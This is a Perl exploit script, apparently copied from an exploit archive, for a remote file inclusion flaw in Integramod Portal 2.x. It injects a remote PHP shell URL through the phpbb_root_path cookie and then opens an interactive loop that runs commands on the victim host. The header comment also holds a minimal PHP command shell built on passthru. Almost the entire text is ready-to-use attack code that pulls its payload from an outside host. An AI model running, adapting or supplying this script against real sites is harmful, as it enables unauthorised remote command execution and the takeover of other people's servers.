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Integramod Portal <= 2.x (functions_portal.php) Remote Include Exploit
====================================================================== Integramod Portal <= 2.x (functions_portal.php) Remote Include Exploit ====================================================================== #!/usr/bin/perl # Method found and exploit scripted by nukedx # # Integramod Portal <= 2.x Remote Command Execution Exploit # # This exploit comes with it's own php shell setting. If you wanna change it your file must contain this data > # # <?php # echo "_START_\n"; # ini_set("max_execution_time",0); # error_reporting(0); # passthru($_REQUEST[command]); # echo "\n_END_"; # ?> # # Copyright 2006 (C) nukedx # # Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Preddy , Yns , |SaMaN|, Caesar , Ogre and all of my friends use IO::Socket; # Default configuration $shell = "http://hometown.aol.com/yarivgiladi/sh.php"; # Checking user settings if(@ARGV != 2) { usage(); } else { exploit(); } sub header() { print "\n- NukedX Security Advisory Nr.2006-43\r\n"; print "- Integramod Portal<= 2.x Remote Command Execution Exploit\r\n"; } sub usage() { header(); print "- Usage: $0 <host> <path>\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <path> -> Path to Integramod ex: /integra/ or just /\r\n"; exit(); } sub exploit() { # User variables $host = $ARGV[0]; $host =~ s/(http:\/\/)//eg; $target = $ARGV[1]."includes/functions_portal.php"; $good = 0; $c2s = "command=whoami"; $c2slen = length($c2s); print "Trying to connect: $host\r\n"; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection failed...\r\n"; print "Connected to victim: $host\r\n"; print $sock "POST $target HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: */*\n"; print $sock "Referer: $host\r\n"; print $sock "Accept-Language: tr\r\n"; print $sock "Content-Type: application/x-www-form-urlencoded\r\n"; print $sock "Accept-Encoding: gzip, deflate\r\n"; print $sock "User-Agent: NukeZilla\r\n"; print $sock "Cookie: phpbb_root_path=".$shell."?\r\n"; print $sock "Content-length: $c2slen\r\n"; print $sock "Connection: Keep-Alive\r\n"; print $sock "Cache-Control: no-cache\r\n\r\n"; print $sock $c2s; print $sock "\r\n\r\n"; while($result = <$sock>) { if($result =~ /^_END_/) { $good=0; close($sock); } if($good==1) { if (!$whoami) { $whoami = trim($result); print "Logged as $whoami\r\nType exit for exit dont press ctrl+c\r\n"; } } if ($good==0) { if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable...\r\nClosing exploit...\r\n";sleep(3);exit(); } } if($result =~ /^_START_/) { $good=1; } } while() { print "[".$whoami."@".$host." /]\$ "; while(<STDIN>) { $cmds=$_; chomp($cmds); last; } if ($cmds =~ /^exit/) { print "Closing exploit...\r\n";sleep(3);exit(); } else { sendcmd(); } } } sub sendcmd () { $c2s = "command=".$cmds; $c2slen = length($c2s); $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection lost...\r\n"; print $sock "POST $target HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: */*\n"; print $sock "Referer: $host\r\n"; print $sock "Accept-Language: tr\r\n"; print $sock "Content-Type: application/x-www-form-urlencoded\r\n"; print $sock "Accept-Encoding: gzip, deflate\r\n"; print $sock "User-Agent: NukeZilla\r\n"; print $sock "Cookie: phpbb_root_path=".$shell."?\r\n"; print $sock "Content-length: $c2slen\r\n"; print $sock "Connection: Keep-Alive\r\n"; print $sock "Cache-Control: no-cache\r\n\r\n"; print $sock $c2s; print $sock "\r\n\r\n"; while($result = <$sock>) { if($result =~ /^_END_/) { $good=0; close($sock); } if($good==1) { print $result; } if ($good==0) { if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable or patched!...\r\nClosing exploit...\r\n";sleep(3);exit(); } } if($result =~ /^_START_/) { $good=1; } } } sub trim($) { my $string = shift; $string =~ s/^\s+//; $string =~ s/\s+$//; return $string; } # 0day.today [2024-12-26] #